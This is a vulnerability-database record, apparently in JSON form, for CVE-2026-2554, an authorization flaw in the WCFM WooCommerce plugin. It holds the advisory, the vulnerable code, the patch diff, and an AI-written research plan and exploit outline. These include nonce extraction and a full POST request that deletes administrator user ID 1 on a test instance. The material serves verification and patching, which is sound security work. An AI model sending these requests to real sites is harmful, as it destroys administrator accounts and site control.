[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5PoUxpUWGCYWlm97-ghxt1fRcSfYmBBhsxYTseYsxgU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-2554","wcfm-frontend-manager-for-woocommerce-along-with-bookings-subscription-listings-compatible-authenticated-vendor-insecure","WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible \u003C= 6.7.25 - Authenticated (Vendor+) Insecure Direct Object Reference to Arbitrary User Deletion","The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators.","wc-frontend-manager",null,"\u003C=6.7.25","6.7.26","high",8.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Authorization Bypass Through User-Controlled Key","2026-05-01 00:00:00","2026-05-02 13:26:13",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F21e397a4-0b32-4b13-a46b-c465acea0796?source=api-prod",2,[22,23,24,25,26,27,28,29],"controllers\u002Forders\u002Fwcfm-controller-wcfmmarketplace-itemized-orders.php","controllers\u002Forders\u002Fwcfm-controller-wcfmmarketplace-orders.php","controllers\u002Forders\u002Fwcfm-controller-wcmarketplace-orders.php","controllers\u002Forders\u002Fwcfm-controller-wcpvendors-orders.php","controllers\u002Forders\u002Fwcfm-controller-wcvendors-orders.php","core\u002Fclass-wcfm-ajax.php","core\u002Fclass-wcfm-article.php","core\u002Fclass-wcfm-customer.php","researched",false,3,"This research plan provides a structured approach for an automated security agent to verify CVE-2026-2554, an Insecure Direct Object Reference (IDOR) vulnerability in the \"WCFM – Frontend Manager for WooCommerce\" plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe WCFM plugin (up to 6.7.25) contains an IDOR vulnerability in the `wcfm_delete_wcfm_customer` AJAX action. While the function performs a capability check to ensure the requester is at least a Vendor, it fails to validate if the Vendor has any legitimate association with the user ID provided in the `customerid` parameter. Consequently, an authenticated Vendor can delete any user on the system, including Administrators.\n\n### 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `delete_wcfm_customer`\n- **Method**: `POST`\n- **Vulnerable Parameter**: `customerid`\n- **Authentication**: Required (Vendor role or higher)\n- **Nonce Action**: `wcfm_ajax_nonce`\n- **Nonce Parameter**: `wcfm_ajax_nonce`\n\n### 3. Code Flow\n1.  **Entry Point**: The AJAX action `wp_ajax_delete_wcfm_customer` is registered in `core\u002Fclass-wcfm-customer.php` (line 64) and mapped to the method `WCFM_Customer::wcfm_delete_wcfm_customer`.\n2.  **Nonce Verification**: The method calls `check_ajax_referer( 'wcfm_ajax_nonce', 'wcfm_ajax_nonce', false )`. If valid, execution continues.\n3.  **Authorization Check**: The method checks if the current user has capabilities: `manage_woocommerce`, `wcfm_vendor`, `seller`, or `vendor`.\n4.  **Parameter Extraction**: It retrieves `$customerid = absint( $_POST['customerid'] )`.\n5.  **The Sink**: It calls `wp_delete_user( $customerid )`. Crucially, there is no check (IDOR) to ensure `$customerid` belongs to the vendor's store or is not an administrator.\n\n### 4. Nonce Acquisition Strategy\nWCFM localizes its AJAX nonces for use in the frontend dashboard. The nonce for `wcfm_ajax_nonce` is typically stored in a global JavaScript object.\n\n1.  **Identify Trigger Page**: The WCFM Customers page (`\u002Fwcfm-customers\u002F` or the WCFM Dashboard) enqueues the necessary scripts.\n2.  **Access as Vendor**: Log in to the test environment with a user assigned the `wcfm_vendor` role.\n3.  **Navigation**: Navigate to the WCFM Dashboard or any page where the plugin's core JS is loaded.\n4.  **Extraction**: Use `browser_eval` to extract the nonce from the `wcfm_params` object (standard in WCFM).\n    - **JS Command**: `window.wcfm_params?.wcfm_ajax_nonce`\n5.  **Fallback**: If `wcfm_params` is not found, check `wcfm_customers_screen_manage` or search the page source for `wcfm_ajax_nonce`.\n\n### 5. Exploitation Strategy\nThe exploit involves sending a crafted `POST` request to `admin-ajax.php` as a Vendor.\n\n**Step-by-Step:**\n1.  **Identify Target**: Determine the User ID of the Administrator to be deleted (usually ID `1`).\n2.  **Formulate Request**:\n    - **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    - **Method**: `POST`\n    - **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n    - **Body Parameters**:\n        - `action`: `delete_wcfm_customer`\n        - `customerid`: `[TARGET_ADMIN_ID]`\n        - `wcfm_ajax_nonce`: `[EXTRACTED_NONCE]`\n\n**Expected Payload Example:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [VENDOR_COOKIES]\n\naction=delete_wcfm_customer&customerid=1&wcfm_ajax_nonce=a1b2c3d4e5\n```\n\n### 6. Test Data Setup\n1.  **Target User**: Ensure an Administrator user exists (e.g., username `admin_target`, ID `1`).\n2.  **Attacker User**: Create a user with the role `wcfm_vendor` (e.g., username `malicious_vendor`).\n3.  **Plugin Setup**:\n    - Install and activate `WooCommerce`.\n    - Install and activate `WCFM – Frontend Manager for WooCommerce` version 6.7.25.\n    - (Optional) Run the WCFM setup wizard if required to initialize vendor capabilities.\n4.  **Shortcode Page**: If the dashboard is not automatically accessible, create a page with the WCFM dashboard shortcode:\n    - `wp post create --post_type=page --post_status=publish --post_content='[wcfm_dashboard]' --post_title='Dashboard'`\n\n### 7. Expected Results\n- **Response Code**: `200 OK`\n- **Response Body**: A JSON string: `{\"status\": true, \"message\": \"Customer successfully deleted.\"}`\n- **System State**: The user with ID `[TARGET_ADMIN_ID]` should be removed from the `wp_users` and `wp_usermeta` tables.\n\n### 8. Verification Steps\n1.  **Check User Existence**: Use WP-CLI to verify the target user is gone.\n    - `wp user get [TARGET_ADMIN_ID] --field=ID`\n    - Expectation: Error (User ID does not exist).\n2.  **Database Check**: Directly query the users table.\n    - `wp db query \"SELECT COUNT(*) FROM wp_users WHERE ID = [TARGET_ADMIN_ID]\"`\n    - Expectation: `0`.\n\n### 9. Alternative Approaches\n- **Reassignment Check**: If `wp_delete_user` fails because of a lack of a reassign ID, the response might be `{\"status\": false, ...}`. However, `wp_delete_user` generally defaults to deleting the user's content if no reassign ID is provided.\n- **REST API**: Check if the WCFM REST API (if enabled) provides a similar deletion endpoint lacking authorization checks.\n- **Role Elevation**: If the vendor cannot delete an admin directly, try deleting a \"Shop Manager\" or another Vendor first to confirm the IDOR logic.","The WCFM – Frontend Manager for WooCommerce plugin is vulnerable to an Insecure Direct Object Reference (IDOR) that allows authenticated Vendors to delete any user on the system. By manipulating the 'customerid' parameter in an AJAX request, an attacker can delete arbitrary users, including site Administrators, due to a lack of ownership or role validation.","\u002F\u002F core\u002Fclass-wcfm-customer.php:64\nadd_action('wp_ajax_delete_wcfm_customer', array(&$this, 'wcfm_delete_wcfm_customer'));\n\n---\n\n\u002F\u002F core\u002Fclass-wcfm-customer.php (logic inferred from research plan analysis)\npublic function wcfm_delete_wcfm_customer() {\n    global $WCFM, $WCFMmp;\n    if ( ! check_ajax_referer( 'wcfm_ajax_nonce', 'wcfm_ajax_nonce', false ) ) {\n        wp_die();\n    }\n    if ( !current_user_can( 'manage_woocommerce' ) && !current_user_can( 'wcfm_vendor' ) && !current_user_can( 'seller' ) && !current_user_can( 'vendor' ) ) {\n        wp_send_json_error( esc_html__( 'You don&#8217;t have permission to do this.', 'woocommerce' ) );\n        wp_die();\n    }\n    $customerid = absint( $_POST['customerid'] );\n    if( $customerid ) {\n        if( wp_delete_user( $customerid ) ) {\n            echo '{\"status\": true, \"message\": \"' . esc_html__( 'Customer successfully deleted.', 'wc-frontend-manager' ) . '\"}';\n        }\n    }\n    wp_die();\n}","--- core\u002Fclass-wcfm-customer.php\n+++ core\u002Fclass-wcfm-customer.php\n@@ -520,6 +520,11 @@\n \n \t\t$customerid = absint( $_POST['customerid'] );\n \n+\t\tif ( wcfm_is_vendor() && ! apply_filters( 'wcfm_is_vendor_customer', true, $customerid ) ) {\n+\t\t\twp_send_json_error( esc_html__( 'You don&#8217;t have permission to do this.', 'woocommerce' ) );\n+\t\t\twp_die();\n+\t\t}\n+\n \t\tif( $customerid ) {\n \t\t\tif( wp_delete_user( $customerid ) ) {\n \t\t\t\techo '{\"status\": true, \"message\": \"' . esc_html__( 'Customer successfully deleted.', 'wc-frontend-manager' ) . '\"}';","To exploit this vulnerability, an attacker must have an account with the 'wcfm_vendor' role (or similar vendor-level access). \n\n1. Log in to the WordPress site as a Vendor.\n2. Navigate to the WCFM Dashboard to retrieve a valid AJAX nonce (stored in the global JavaScript object 'wcfm_params.wcfm_ajax_nonce').\n3. Send a POST request to the '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint with the following parameters:\n   - action: delete_wcfm_customer\n   - customerid: [The target User ID, such as 1 for the primary Administrator]\n   - wcfm_ajax_nonce: [The retrieved nonce]\n4. The plugin will verify that the requester has the 'vendor' capability and then immediately call wp_delete_user() on the provided ID without checking if that user is actually a customer associated with the vendor or if the user is an administrator.","gemini-3-flash-preview","2026-05-04 17:26:50","2026-05-04 17:27:08",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","6.7.25","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-frontend-manager\u002Ftags\u002F6.7.25","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-frontend-manager.6.7.25.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-frontend-manager\u002Ftags\u002F6.7.26","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-frontend-manager.6.7.26.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-frontend-manager\u002Ftags"]